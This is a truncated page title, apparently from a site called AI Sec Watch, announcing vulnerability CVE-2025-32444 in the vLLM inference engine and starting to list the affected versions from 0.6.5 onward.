CVE-2025-32444: vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Versions starting from 0.6.5 and p | AI Sec Watch